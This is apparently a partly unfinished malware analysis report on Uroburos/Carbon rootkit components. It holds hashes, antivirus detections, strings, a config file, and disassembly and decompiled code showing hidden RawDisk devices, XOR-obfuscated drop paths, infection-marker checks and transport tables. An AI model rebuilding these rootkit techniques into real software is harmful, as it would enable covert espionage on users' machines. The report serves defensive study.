%s:%d
\\%s\pipe\%s
m_create() failed.
net_user=%s
net_password=%s
m_setoptlist() failed.
m_connect() failed.
m_send() AUTH failed.
m_recv() AUTH failed.
AUTH failed.
m_send() WHO failed.
m_send() OBJECT failed.
m_recv() OBJECT failed.
Trans task %d for obj %s ACTIVE fail robj=%s
OBJECT ACK failed.
m_send() TASK failed.
m_recv() WIN RESULT failed.
m_recv() ACT RESULT failed.
m_send() ACT RESULT failed.
enable
L|-1|can`t find entry point %s|
L|-1|loadlibrary() failed %d|
L|-1|%s|%d|
L|-1|try to run dll %s with user priv|
L|-1|can`t get characs %s|
L|-1|not PE format %s|
L|-1| parse error %s|
L|-1|  parse error %s|
L|0|%s|
L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|
L|-1|AS_CUR_USER:DuplicateTokenEx():%d, %s|
L|-1|AS_CUR_USER:LogonUser():%d, %s|
L|-1|wrong priv %s|
L|-1|CreateProcessAsUser():%d, %s|
D:AI
TCP: resolving host name...
TCP: resolved %s
TCP: closed.
TCP: connecting...
nodelay
Y1N0
TCP: send
TCP: recv
%s:%u
Frag: send
frag_size
frag_no_scrambling
peer_frag_size
\\.\pipe\
allow
*everyone
read_peer_nfo
write_peer_nfo
net_user
net_password
imp_level
no_server_hijack
every1
anonymous
\pipe\
\ipc$
frag
transports
licence error
Sample E - usbdev.sys - x64 - (Resouce: 161)
Hashes
| Type of Hash | Hash | 
|---|---|
| MD5 | 62e9839bf0b81d7774a3606112b318e8 | 
| SHA1 | 6f2e50c5f03e73e77484d5845d64d952b038a12b | 
| SHA-256 | 39050386f17b2d34bdbd118eec62ed6b2f386e21500a740362454ed73ea362e8 | 
| ssdeep | 3072:S9f3buYUVKa6a1206K55kL+tkA3qkQQ0dwZATH:S9iYUImo06KXkL+qA6kf0dwK | 
VirusTotal results for sample E
| AV product | Result | 
|---|---|
| McAfee+Artemis | Pfinet | 
| nProtect | Trojan/W32.Agent.228352.W | 
| McAfee | Pfinet | 
| F-Prot | W32/Pfinet.A | 
| a-squared | Backdoor.Pfinet!IK | 
| Avast | Win32:Malware-gen | 
| ClamAV | Trojan.Agent-126457 | 
| Kaspersky | Trojan.Win32.Agent.czua | 
| BitDefender | Trojan.Generic.2617254 | 
| Comodo | TrojWare.Win32.Agent.czua | 
| F-Secure | Trojan:W64/Carbys.gen!A | 
| DrWeb | Trojan.Siggen.27969 | 
| TrendMicro | TROJ_PFINET.A | 
| Authentium | W32/Pfinet.A | 
| Jiangmin | Trojan/Agent.dcrw | 
| Antiy-AVL | Trojan/Win32.Agent.gen | 
| Symantec | Backdoor.Pfinet | 
| Microsoft | Backdoor:WinNT/Pfinet.B | 
| GData | Trojan.Generic.2617254 | 
| VBA32 | Trojan.Win32.Agent.czua | 
| PCTools | Backdoor.Pfinet | 
| Ikarus | Backdoor.Pfinet | 
| AVG | Agent2.YKW | 
| Panda | Rootkit/Agent.MXI | 
Scanned: 2009-12-27 12:15:01 - 40 scans - 24 detections (60.0%)
File characteristics
Meta data
Size:    228352 bytes
Type:    PE32+ executable (DLL) (native) x86-64, for MS Windows
Date:    0x4AC48FE7 [Thu Oct  1 11:17:59 2009 UTC]
EP:      0x21454 .text 0/6
CRC:     Claimed: 0x397f7, Actual: 0x397f7
Sections
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x2126c      0x21400      6.518352
.basein    0x23000      0xc7         0x200        2.902918
.data      0x24000      0x23a3c      0x13400      1.284443
.pdata     0x48000      0x10b0       0x1200       5.035513
INIT       0x4a000      0x10ce       0x1200       4.944873
.reloc     0x4c000      0x99a        0xa00        4.576183
Strings
The strings correspond mostly to the ones of Sample B.
Sample F - inetpub.dll - x64 (Resource: 162)
Hashes
| Type of Hash | Hash | 
|---|---|
| MD5 | e1ee88eda1d399822587eb58eac9b347 | 
| SHA1 | 32287d26656587c6848902dbed8086c153d94ee7 | 
| SHA-256 | 92c2023095420de3ca7d53a55ed689e7c0086195dc06a4369e0ee58a803c17bb | 
| ssdeep | 3072:vr84EaVK9B9MklzeALxqS6kcLyHFQ+vYnb9f3bkrlESXdMQyFc8:QPp9B9MkllLMScLmsb9IKrF1 | 
VirusTotal results for sample F
| AV product | Result | 
|---|---|
| Symantec | Backdoor.Pfinet | 
Scanned: 2014-03-23 21:27:06 - 51 scans - 1 detections (1.0%)
File characteristics
Meta data
Size:    113664 bytes
Type:    PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Date:    0x4AC5A6C2 [Fri Oct  2 07:07:46 2009 UTC]
EP:      0x200149d0 .text 0/5
CRC:     Claimed: 0x0, Actual: 0x1e6b8 [SUSPICIOUS]
Sections
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x13b8d      0x13c00      6.247940
.rdata     0x15000      0x582e       0x5a00       6.692290
.data      0x1b000      0x1ae0       0x1400       4.598089
.pdata     0x1d000      0x8c4        0xa00        4.522066
.reloc     0x1e000      0x248        0x400        2.325587
Strings
The strings correspond mostly to the ones of Sample C.
Sample G - cryptoapi.dll - x64 (Resource: 165)
Hashes
| Type of Hash | Hash | 
|---|---|
| MD5 | a7853bab983ede28959a30653baec74a | 
| SHA1 | eee11da421c7268e799bd938937e7ef754a895bf | 
| SHA-256 | 0e3842bd092db5c0c70c62e8351649d6e3f75e97d39bbfd0c0975b8c462a65ca | 
| ssdeep | 3072:U/ylCK5WUZFspUjcF65zlEzEOflC9Pw6OPEH66kcXF9f3b6ivgCUHXM:1gWWUrg3ANOP+6cXF9/u | 
VirusTotal results for sample G
| AV product | Result | 
|---|---|
| Symantec | Backdoor.Pfinet | 
| AntiVir | TR/ATRAPS.Gen2 | 
Scanned: 2014-03-23 21:26:59 - 51 scans - 2 detections (3.0%)
File characteristics
Meta data
Size:    147968 bytes
Type:    PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Date:    0x4AC5A685 [Fri Oct  2 07:06:45 2009 UTC]
EP:      0x2001bd80 .text 0/6
CRC:     Claimed: 0x0, Actual: 0x32c9f [SUSPICIOUS]
Sections
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x1af6d      0x1b000      6.195387
.basein    0x1c000      0xc7         0x200        2.902918
.rdata     0x1d000      0x66f0       0x6800       6.585248
.data      0x24000      0x1b00       0x1400       4.647566
.pdata     0x26000      0xad4        0xc00        4.848795
.reloc     0x27000      0x2a6        0x400        2.344107
Strings
The strings correspond mostly to the ones of Sample D.
Sample H - config.txt
Hashes
| Type of Hash | Hash | 
|---|---|
| MD5 | 08cbc46302179c4cda4ec2f41fc9a965 | 
| SHA1 | 6a905818f9473835ac90fc38b9ce3958bfb664d6 | 
| SHA-256 | 3576035105b4714433331dff1f39a50d55f4548701b6ab8343a16869903ebc3c | 
Content
1[NAME] 2object_id= 3 4 5[TIME] 6user_winmin = 600000 7user_winmax = 1200000 8sys_winmin = 3600000 9sys_winmax = 3700000 10task_min = 20000 11task_max = 30000 12checkmin = 60000 13checkmax = 70000 14logmin = 600000 15logmax = 1200000 16lastconnect= 17timestop= 18active_con = 900000 19time2task=3600000 20 21 22[CW_LOCAL] 23quantity = 0 24 25[CW_INET] 26quantity = 0 27 28 29[TRANSPORT] 30user_pipe = \\.\pipe\userpipe 31system_pipe = \\.\pipe\iehelper 32 33 34[DHCP] 35server = 135 36 37 38[LOG] 39lastsend = 40logperiod = 7200 41 42[WORKDATA] 43run_task= 44run_task_system=
Analysis - Payload
Sample B - usbdev.sys (Resource: 101)
A very extensive analysis of a similar kernel module of Sample B (usbdev.sys) has been documented in ‘Uroburos: the snake rootkit’ 2 by deresz and tecamac.
Sample B also checks for the presence of infection markers in form of events:
.text:00023210                 push    ebp
.text:00023211                 mov     ebp, esp
.text:00023213                 sub     esp, 130h
.text:00023219                 mov     [ebp+string.Length], 70h
.text:0002321F                 mov     [ebp+string.MaximumLength], 72h
.text:00023225                 mov     [ebp+string.Buffer], offset aBasenamedobjec ; "\\BaseNamedObjects\\{B93DFED5-9A3B-459b"...
.text:0002322C                 lea     eax, [ebp+var_110]
.text:00023232                 mov     [ebp+SecurityDescriptor], eax
.text:00023235                 mov     [ebp+ObjectAttributes.Length], 18h
.text:0002323F                 mov     [ebp+ObjectAttributes.RootDirectory], 0
.text:00023249                 mov     [ebp+ObjectAttributes.Attributes], 40h
.text:00023253                 lea     ecx, [ebp+string]
.text:00023256                 mov     [ebp+ObjectAttributes.ObjectName], ecx
.text:0002325C                 mov     [ebp+ObjectAttributes.SecurityDescriptor], 0
.text:00023266                 mov     [ebp+ObjectAttributes.SecurityQualityOfService], 0
.text:00023270                 lea     edx, [ebp+ObjectAttributes]
.text:00023276                 push    edx             ; ObjectAttributes
.text:00023277                 push    1F0003h         ; DesiredAccess
.text:0002327C                 lea     eax, [ebp+EventHandle]
.text:00023282                 push    eax             ; EventHandle
.text:00023283                 call    ZwOpenEvent
or as pseudo-code:
1 string.Length = 0x70; 2 string.MaximumLength = 0x72; 3 string.Buffer = L"\\BaseNamedObjects\\{B93DFED5-9A3B-459b-A617-59FD9FAD693E}"; 4 SecurityDescriptor = &v4; 5 ObjectAttributes.Length = 24; 6 ObjectAttributes.RootDirectory = 0; 7 ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE; 8 ObjectAttributes.ObjectName = &string; 9 ObjectAttributes.SecurityDescriptor = 0; 10 ObjectAttributes.SecurityQualityOfService = 0; 11 if ( ZwOpenEvent(&EventHandle, 0x1F0003u, &ObjectAttributes) ) 12 { 13 ...
That means, the famous Agent.btz marker
\BaseNamedObjects\{B93DFED5-9A3B-459b-A617-59FD9FAD693E}
is checked directly using a UNICODE_STRING structure without using RtlInitUnicodeString(). A brief comparison with other samples, like
| Type of Hash | Hash | 
|---|---|
| MD5 | 57770d70b704811e8ac13893337cea32 | 
| SHA1 | 0e6dff1007b6a5f744b2bc90978496328c95ed11 | 
| SHA-256 | 65fdaf08e562611ce58f1d427f198f8743d88a68e1c4d92afe6dc6251e8a3112 | 
or
| Type of Hash | Hash | 
|---|---|
| MD5 | 06a3f5df6ac23db15ba52581a38c725b | 
| SHA1 | a6cc9d9034637192d264cb4e9b6b83b70cc36da9 | 
| SHA-256 | 43e71b993d6e7c977caaf2ed7610a71758734d87ec2ceb20a84e573ea05a01b3 | 
shows, that this marker is checked in the same way.
The analysis of this kernel module by deresz and tecamac is very detailed. We advise the interested reader to work through their document to understand all the details.
Implemented transports
In this module, the following transport or communication modules are present:
- Type 1: tcp
- Type 2: np, m2b
-> TODO: Compare this with the observed transports in
- userland modules
- modules described in other reports
Disassembler Library
This sample contains a large chunk of code taken from the Udis86 Disassembler Library for x86 / x86-64 project6
RawDisk1, RawDisk2 and fixdata.dat
The devices
- \Device\RawDisk1
- \Device\RawDisk2
and the file
- \SystemRoot\$NtUninstallQ722833$\fixdata.dat
are already known from other reports.
If the file fixdata.dat could successfully be created within the function
1NTSTATUS create\_fixdata_dat() 2{ 3 char v1; 4 NTSTATUS error; 5 OBJECT_ATTRIBUTES ObjectAttributes; 6 LARGE_INTEGER AllocationSize; 7 UNICODE_STRING Name; 8 UINT_PTR ViewSize; 9 __int64 FileInformation; 10 struct _IO_STATUS_BLOCK IoStatusBlock; 11 12 Name.Length = 0x58; 13 Name.MaximumLength = 0x5A; 14 Name.Buffer = L"\\SystemRoot\\$NtUninstallQ722833$\\fixdata.dat"; 15 ObjectAttributes.Length = 24; 16 ObjectAttributes.RootDirectory = 0; 17 ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE; 18 ObjectAttributes.ObjectName = &Name; 19 ObjectAttributes.SecurityDescriptor = 0; 20 ObjectAttributes.SecurityQualityOfService = 0; 21 AllocationSize = 0x6400000i64; 22 error = call_IoCreateFile( 23 &FileHandle, 24 FILE_ADD_FILE|FILE_LIST_DIRECTORY, 25 &ObjectAttributes, 26 &IoStatusBlock, 27 &AllocationSize, 28 FILE_ATTRIBUTE_NORMAL, 29 0, 30 FILE_OPEN_IF, 31 FILE_RANDOM_ACCESS|FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_NO_INTERMEDIATE_BUFFERING, 32 0, 33 0); 34 if ( !error ) 35 { 36 dword_5BDEC = FileHandle; 37 if ( IoStatusBlock.Information == 2 ) 38 { 39 FileInformation = AllocationSize.QuadPart; 40 error = ZwSetInformationFile(FileHandle, &IoStatusBlock, &FileInformation, 8u, FileEndOfFileInformation); 41 if ( error ) 42 goto LABEL_10; 43 v1 = 1; 44 } 45 else 46 { 47 v1 = 0; 48 } 49 ObjectAttributes.Length = 24; 50 ObjectAttributes.RootDirectory = 0; 51 ObjectAttributes.Attributes = 0; 52 ObjectAttributes.ObjectName = 0; 53 ObjectAttributes.SecurityDescriptor = 0; 54 ObjectAttributes.SecurityQualityOfService = 0; 55 error = ZwCreateSection(&gSectionHandle, 6u, &ObjectAttributes, 0, 4u, 0x18000000u, FileHandle); 56 if ( !error ) 57 { 58 ViewSize = 0; 59 error = ZwMapViewOfSection(gSectionHandle, 0xFFFFFFFF, &BaseAddress_0, 0, 0, 0, &ViewSize, ViewUnmap, 0, 4u); 60 if ( !error ) 61 { 62 gViewSize = ViewSize; 63 dword_4FBD4[0] = 0; 64 if ( v1 ) 65 sub_2F6E0(0, gViewSize, 2, gViewSize >> 15, 32, 0x200u); 66 } 67 } 68 } 69LABEL_10: 70 if ( error ) 71 { 72 if ( BaseAddress_0 ) 73 { 74 ZwUnmapViewOfSection(0xFFFFFFFF, BaseAddress_0); 75 BaseAddress_0 = 0; 76 } 77 if ( gSectionHandle ) 78 { 79 ZwClose_1(gSectionHandle); 80 gSectionHandle = 0; 81 } 82 ZwClose_1(FileHandle); 83 FileHandle = 0; 84 } 85 return error; 86}
also the devices are created within this function:
1NTSTATUS create_file_rawdisk() 2{ 3 NTSTATUS ERROR; 4 OBJECT_ATTRIBUTES ObjectAttributes; 5 LSA_UNICODE_STRING DestinationString; 6 UINT_PTR ViewSize; 7 8 if ( disks_initialized ) 9 { 10 ERROR = 0; 11 } 12 else if ( DriverObject ) 13 { 14 sub_2DFD0(&Lock); 15 KeInitializeEvent(&Event, SynchronizationEvent, 0); 16 sub_2DFB0(&ListHead); 17 ERROR = sub_2F490(); 18 if ( !ERROR ) 19 { 20 RtlInitUnicodeString(&DestinationString, L"\\Device\\RawDisk1"); 21 ERROR = IoCreateDevice( 22 DriverObject, 23 0, 24 &DestinationString, 25 FILE_DEVICE_DISK, 26 FILE_REMOVABLE_MEDIA, 27 0, 28 &DeviceObject_RawDisk1); 29 if ( !ERROR ) 30 { 31 ERROR = call_SeSetSecurityDescriptorInfo(DeviceObject_RawDisk1); 32 if ( !ERROR ) 33 { 34 DeviceObject_RawDisk1->Flags = (DeviceObject_RawDisk1->Flags | 0x10); 35 DeviceObject_RawDisk1->Flags = DeviceObject_RawDisk1->Flags & 0xFFFFFF7F; 36 ObjectAttributes.Length = 24; 37 ObjectAttributes.RootDirectory = 0; 38 ObjectAttributes.Attributes = 0; 39 ObjectAttributes.ObjectName = 0; 40 ObjectAttributes.SecurityDescriptor = 0; 41 ObjectAttributes.SecurityQualityOfService = 0; 42 MaximumSize = 0x1000000i64; 43 ERROR = ZwCreateSection(&SectionHandle, 6u, &ObjectAttributes, &MaximumSize, 4u, 0x18000000u, 0); 44 if ( !ERROR ) 45 { 46 ViewSize = MaximumSize.LowPart; 47 ERROR = ZwMapViewOfSection(SectionHandle, 0xFFFFFFFF, &BaseAddress, 0, 0, 0, &ViewSize, ViewUnmap, 0, 4u); 48 if ( !ERROR ) 49 { 50 MaximumSize = ViewSize; 51 RtlInitUnicodeString(&DestinationString, L"\\Device\\RawDisk2"); 52 ERROR = IoCreateDevice( 53 DriverObject, 54 0, 55 &DestinationString, 56 FILE_DEVICE_DISK, 57 FILE_REMOVABLE_MEDIA, 58 0, 59 &DeviceObject_RawDisk2); 60 if ( !ERROR ) 61 { 62 ERROR = call_SeSetSecurityDescriptorInfo(DeviceObject_RawDisk2); 63 if ( !ERROR ) 64 { 65 DeviceObject_RawDisk2->Flags = (DeviceObject_RawDisk2->Flags | 0x10); 66 DeviceObject_RawDisk2->Flags = DeviceObject_RawDisk2->Flags & 0xFFFFFF7F; 67 sub_2F6E0(1, MaximumSize.LowPart, 2, MaximumSize.LowPart >> 15, 32, 0x200u); 68 byte_4FBBD = 0; 69 ERROR = create_system_threads(&handle, sub_2EFB0, 0, 0); 70 disks_initialized = 1; 71 } 72 } 73 } 74 } 75 } 76 } 77 } 78 if ( ERROR ) 79 { 80 if ( DeviceObject_RawDisk1 ) 81 { 82 IoDeleteDevice(DeviceObject_RawDisk1); 83 DeviceObject_RawDisk1 = 0; 84 } 85 if ( DeviceObject_RawDisk2 ) 86 { 87 IoDeleteDevice(DeviceObject_RawDisk2); 88 DeviceObject_RawDisk2 = 0; 89 } 90 if ( BaseAddress ) 91 { 92 ZwUnmapViewOfSection(0xFFFFFFFF, BaseAddress); 93 BaseAddress = 0; 94 } 95 if ( SectionHandle ) 96 { 97 ZwClose_1(SectionHandle); 98 SectionHandle = 0; 99 } 100 } 101 } 102 else 103 { 104 ERROR = 0xC0000001; 105 } 106 return ERROR; 107}
Decryption of string for VFS drive
The authors demonstrate that they have a sense of humor. In the following example, they decrypt (XOR) the strings used to assemble the locations of where to drop the other components of the malware to. The final destinations are:
- \.\IdeDrive1\cryptoapi.dll
- \.\IdeDrive1\inetpub.dll
But have a closer look at how they decrypt the string:
[...]
.text:0001E122                 mov     [ebp+xor_key], 4E415341h ; key
.text:0001E129                 mov     [ebp+part_1], 7253605h   ; part 1 encrypted 
.text:0001E130                 mov     [ebp+part_2], 3C282524h  ; part 2 encrypted
[...]
.text:0001E17B                 mov     eax, [ebp+part_1]     
.text:0001E17E                 xor     eax, [ebp+xor_key]       ; decrypt part 1: IdeD
.text:0001E181                 mov     [ebp+part_1], eax
[...]
.text:0001E184                 mov     ecx, [ebp+part_2]
.text:0001E18A                 xor     ecx, [ebp+xor_key]       ; decrypt part 2: rive
.text:0001E18D                 mov     [ebp+part_2], ecx
[...]
They are seriously using a key 0x4E415341 to decrypt the string. 0x4E415341 is ASCII for ‘NASA’. That’s how they decrypt and assemble the string IdeDrive, appending a ‘1’ in the next step and using if for creating the destination. Full excerpt below:
[...]
.text:0001E11B                 mov     [ebp+var_20], 0
.text:0001E122                 mov     [ebp+xor_key], 4E415341h
.text:0001E129                 mov     [ebp+part_1], 7253605h
.text:0001E130                 mov     [ebp+part_2], 3C282524h
.text:0001E13A                 xor     eax, eax
.text:0001E13C                 mov     [ebp+drive], eax
.text:0001E142                 mov     [ebp+var_338], eax
.text:0001E148                 mov     [ebp+var_334], ax
.text:0001E14F                 push    104h            ; size_t
.text:0001E154                 push    0               ; int
.text:0001E156                 lea     ecx, [ebp+cryptoapi.dll]
.text:0001E15C                 push    ecx             ; void *
.text:0001E15D                 call    memset
.text:0001E162                 add     esp, 0Ch
.text:0001E165                 push    104h            ; size_t
.text:0001E16A                 push    0               ; int
.text:0001E16C                 lea     edx, [ebp+inetpub.dll]
.text:0001E172                 push    edx             ; void *
.text:0001E173                 call    memset
.text:0001E178                 add     esp, 0Ch
.text:0001E17B                 mov     eax, [ebp+part_1]
.text:0001E17E                 xor     eax, [ebp+xor_key]
.text:0001E181                 mov     [ebp+part_1], eax
.text:0001E184                 mov     ecx, [ebp+part_2]
.text:0001E18A                 xor     ecx, [ebp+xor_key]
.text:0001E18D                 mov     [ebp+part_2], ecx
.text:0001E193                 mov     edx, [ebp+part_1]
.text:0001E196                 push    edx
.text:0001E197                 call    order_bytes
.text:0001E19C                 mov     [ebp+part_1], eax
.text:0001E19F                 mov     eax, [ebp+part_1]
.text:0001E1A2                 mov     [ebp+part_1], eax
.text:0001E1A5                 mov     ecx, [ebp+part_2]
.text:0001E1AB                 push    ecx
.text:0001E1AC                 call    order_bytes
.text:0001E1B1                 mov     [ebp+part_2], eax
.text:0001E1B7                 mov     edx, [ebp+part_2]
.text:0001E1BD                 mov     [ebp+part_2], edx
.text:0001E1C3                 mov     eax, [ebp+part_1]
.text:0001E1C6                 mov     [ebp+drive], eax
.text:0001E1CC                 mov     ecx, [ebp+part_2]
.text:0001E1D2                 mov     [ebp+var_338], ecx
.text:0001E1D8                 lea     edx, [ebp+drive]
.text:0001E1DE                 add     edx, 0FFFFFFFFh
.text:0001E1E1                 mov     [ebp+var_454], edx
.text:0001E1E7                 mov     eax, [ebp+var_454]
.text:0001E1ED                 mov     cl, [eax+1]
.text:0001E1F0                 mov     [ebp+var_455], cl
.text:0001E1F6                 add     [ebp+var_454], 1
.text:0001E1FD                 cmp     [ebp+var_455], 0
.text:0001E204                 jnz     short loc_1E1E7
.text:0001E206                 mov     edi, [ebp+var_454]
.text:0001E20C                 mov     dx, word ptr ds:a1 ; "1"
.text:0001E213                 mov     [edi], dx
.text:0001E216                 lea     eax, [ebp+drive]
.text:0001E21C                 push    eax
.text:0001E21D                 push    offset a??SCryptoapi_d ; "\\??\\%s\\cryptoapi.dll"
.text:0001E222                 lea     ecx, [ebp+cryptoapi.dll]
.text:0001E228                 push    ecx             ; char *
.text:0001E229                 call    sprintf
.text:0001E22E                 add     esp, 0Ch
.text:0001E231                 lea     edx, [ebp+drive]
.text:0001E237                 push    edx
.text:0001E238                 push    offset a??SInetpub_dll ; "\\??\\%s\\inetpub.dll"
.text:0001E23D                 lea     eax, [ebp+inetpub.dll]
.text:0001E243                 push    eax             ; char *
.text:0001E244                 call    sprintf
[...]
To describe
\Registry\Machine\usblink_export
HKEY_LOCAL_MACHINE\usblink_export
(also LEGACY_usblink and usblink?)
Potentially old code
The malware checks if the queried process has one of the following names
1bool __stdcall match_list_of_programs_by_name(char *a1) 2{ 3 return !stricmp(a1, "iexplore.exe") 4 || !stricmp(a1, "firefox.exe") 5 || !stricmp(a1, "opera.exe") 6 || !stricmp(a1, "netscape.exe") 7 || !stricmp(a1, "mozilla.exe") 8 || !stricmp(a1, "msimn.exe") 9 || !stricmp(a1, "outlook.exe") 10 || !stricmp(a1, "adobeupdater.exe"); 11}
and if so, it would call pulse_event_wininet_activate().
The event \BaseNamedObjects\wininet_activate is then created and pulsed.
1NTSTATUS pulse_event_wininet_activate() 2{ 3 NTSTATUS result; 4 LSA_UNICODE_STRING DestinationString; 5 OBJECT_ATTRIBUTES ObjectAttributes; 6 HANDLE EventHandle; 7 wchar_t SourceString; 8 9 swprintf(&SourceString, L"\\BaseNamedObjects\\%S", "wininet_activate"); 10 RtlInitUnicodeString(&DestinationString, &SourceString); 11 ObjectAttributes.Length = 24; 12 ObjectAttributes.RootDirectory = 0; 13 ObjectAttributes.Attributes = 0; 14 ObjectAttributes.ObjectName = &DestinationString; 15 ObjectAttributes.SecurityDescriptor = 0; 16 ObjectAttributes.SecurityQualityOfService = 0; 17 result = ZwOpenEvent(&EventHandle, 2u, &ObjectAttributes); 18 if ( !result ) 19 { 20 result = ZwPulseEvent(EventHandle, 0); 21 ZwClose_1(EventHandle); 22 } 23 return result; 24}
There are no references to this event, neither in this module nor in the other analyzed modules. Microsoft mentions in the documentation of the PulseEvent function 7:
Note This function is unreliable and should not be used. It exists mainly for backward compatibility. For more information, see Remarks.
So it could well be that this part is old code and was forgotten to be removed.
Applying work-around for bugs related to AMD Athlon and AGP graphics port
From Microsoft Support article AGP program may hang when using page size extension on Athlon processor 8 the following excerpt:
The following workaround for this issue prevents Memory Manager from using the processor’s Page Size Extension feature and may affect the performance of some programs, depending on the paging behavior. This registry value also limits non-paged pool to a maximum of 128 megabytes (MB) instead of 256 MB.
1int __stdcall disable_processors_page_size_extension_feature(int a1) 2{ 3 name[0] = 0xA8; 4 name[1] = 0xAA; 5 *&name[2] = L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management"; 6 ValueName.Length = 32; 7 ValueName.MaximumLength = 34; 8 ValueName.Buffer = L"LargePageMinimum"; 9 Data = -1; 10 v2 = sub_19110(); 11 if ( !v2 ) 12 { 13 ObjectAttributes.Length = 24; 14 ObjectAttributes.RootDirectory = 0; 15 ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE; 16 ObjectAttributes.ObjectName = name; 17 ObjectAttributes.SecurityDescriptor = 0; 18 ObjectAttributes.SecurityQualityOfService = 0; 19 if ( !ZwOpenKey(&KeyHandle, 2u, &ObjectAttributes) ) 20 { 21 ZwSetValueKey(KeyHandle, &ValueName, 0, 4u, &Data, 4u); 22 ZwClose_1(KeyHandle); 23 } 24} 25
Sample D - cryptoapi.dll (Resource: 105)
Original filename: carbon_system.dll
Internal name: Carbon v3.61
This component first initializes the winsock subsystem by calling WSAStartup. Right after it creates directories on the VFS:
 CreateDirectoryA("\\\\.\\IdeDrive1\\\\Tasks\\", (LPSECURITY_ATTRIBUTES)&Dst);
 CreateDirectoryA("\\\\.\\IdeDrive1\\\\Results\\", (LPSECURITY_ATTRIBUTES)&Dst);
Sample D is the next file in the logical execution order, as it creates the following mutexes, which are also accessed by Sample E. Sample D can be considered the main userland module, a control unit that sets up the communication with the kernel module and has the ability to load plugins dynamically during runtime. The internal name of this module, carbon_system.dll, supports this observation.
Mutexes from cryptoapi.dll
Global\\MSMMC.StartupEnvironment.PPT
Global\\411A5195CD73A8a710E4BB16842FA42C
Global\\881F0621AC59C4c035A5DC92158AB85E
Global\\MSCTF.Shared.MUTEX.RPM
Global\\WindowsShellHWDetection
Global\\MSDBG.Global.MUTEX.ATF
For reading or writing operations on files, exclusive access is ensured by locking them with mutexes:
- Global\MSMMC.StartupEnvironment.PPT is used for operations on the configuration file.
- Global\411A5195CD73A8a710E4BB16842FA42C is used to exclusively access temporary files
- Global\MSDBG.Global.MUTEX.ATF is used to exclusively access \.\IdeDrive1\log.txt
- Global\WindowsShellHWDetection is used to exclusively access \.\IdeDrive1\Results\result.txt
- Global\MSCTF.Shared.MUTEX.RPM is used to exclusively access \.\IdeDrive1\Tasks\task.txt
- Global\881F0621AC59C4c035A5DC92158AB85E is used to exclusively access \.\IdeDrive1\Tasks\task_system.txt
During the startup of the ModuleStart() function, 6 threads are being started. The first two are:
- get_initialization_parameters_create_GUID_and_check_Packet_Capturing()
- periodic_free_space_check_and_write_log()
These serve the purpose of initializing the environment for the malware and running maintenance and log tasks.
Then a function load_transports() is called (more later), and then four more threads are started:
- read_config_start_thread_start()
- thread 5 - handles frag.np/frag.tcp requests
- thread 6 - handles frag.np/frag.tcp requests
- execute_plugin() - starts a new thread, calling a DLLs export ModuleStart from the \.\IdeDrive1\\Plugins\ directory
load_transports()
In this module, the following transport or communication modules are present:
- Type 1: tcp, b2m
- Type 2: np, frag, m2b
each associated with a bunch of functions:
np_functions    func_obj_3 <44h, offset sub_2000FAF9, offset sub_2000FB13, \
.data:2001EE30                   offset sub_2000FB2B, offset sub_2000FC37, \
.data:2001EE30                   offset sub_2000FC91, offset sub_2000FD8E, \
.data:2001EE30                   offset sub_2000FECC, offset sub_20010798, \
.data:2001EE30                   offset sub_20010046, offset sub_2001030F, \
.data:2001EE30                   offset sub_200103BA, offset sub_200103DB, \
.data:2001EE30                   offset sub_2000EB1A, offset sub_2001077D, \
.data:2001EE30                   offset sub_20010798, offset sub_2001079E>
frag_functions  func_obj <4Ch, offset sub_2000DA6E, offset return, \
.data:2001EE78                 offset sub_2000EC14, offset sub_2000EC9E, \
.data:2001EE78                 offset sub_2000ECB2, offset sub_2000ECF3, \
.data:2001EE78                 offset sub_2000ED69, offset sub_2000F5D4, \
.data:2001EE78                 offset sub_2000F4F9, offset sub_2000EDF5, \
.data:2001EE78                 offset sub_2000F185, offset sub_2000F5EB, \
.data:2001EE78                 offset sub_2000EB1A, offset sub_2001077D, \
.data:2001EE78                 offset sub_2000F48B, offset sub_2000F4DA, 0, 0, 0>
m2b_functions   func_obj <4Ch, offset sub_2000DA6E, offset return, \
.data:2001EEC8                 offset sub_2000E8C8, offset sub_2000E93B, \
.data:2001EEC8                 offset sub_2000DB2B, offset sub_2000E94A, \
.data:2001EEC8                 offset sub_2000E956, offset sub_2000E9B5, \
.data:2001EEC8                 offset sub_2000E9C7, offset sub_2000E9D9, \
.data:2001EEC8                 offset sub_2000EA0C, offset sub_2000EADE, \
.data:2001EEC8                 offset sub_2000EB1A, offset sub_2000EB26, \
.data:2001EEC8                 offset sub_2000EB47, offset sub_2000EB66, \
.data:2001EEC8                 offset sub_2000EB85, offset sub_2000EBE5, 0>
tcp_functions   func_obj_2 <40h, offset sub_2000DDD6, offset WSACleanup, \
.data:2001EF18                   offset sub_2000DE03, offset sub_2000E0FE, \
.data:2001EF18                   offset sub_2000E14A, offset sub_2000E156, \
.data:2001EF18                   offset sub_2000E1D3, offset sub_20010798, \
.data:2001EF18                   offset sub_2000E288, offset sub_2000E31F, \
.data:2001EF18                   offset sub_2000E499, offset sub_2001077D, \
.data:2001EF18                   offset sub_2000E634, offset sub_2000E661, \
.data:2001EF18                   offset sub_2000E715>
b2m_functions   func_obj_2 <40h, offset sub_2000DA6E, offset return, \
.data:2001EF58                   offset sub_2000DA71, offset sub_2000DAF9, \
.data:2001EF58                   offset sub_2000DB2B, offset sub_2000DB44, \
.data:2001EF58                   offset sub_2000DB54, offset sub_2000DBB2, \
.data:2001EF58                   offset sub_2000DBC7, offset sub_2000DBDC, \
.data:2001EF58                   offset sub_2000DBF6, offset sub_2000DD63, \
.data:2001EF58                   offset sub_2000DD84, offset sub_2000DDA2, \
.data:2001EF58                   offset sub_2000DDC0>
TODO: these functions need to be analyzed and described
Other reports mention different other transports that are not present in this collection.
| Transport (Type) | CIRCL | BAE | deresz/tecamac | 
|---|---|---|---|
| tcp (1) | x | x | |
| b2m (1) | x | ||
| np (2) | x | x | |
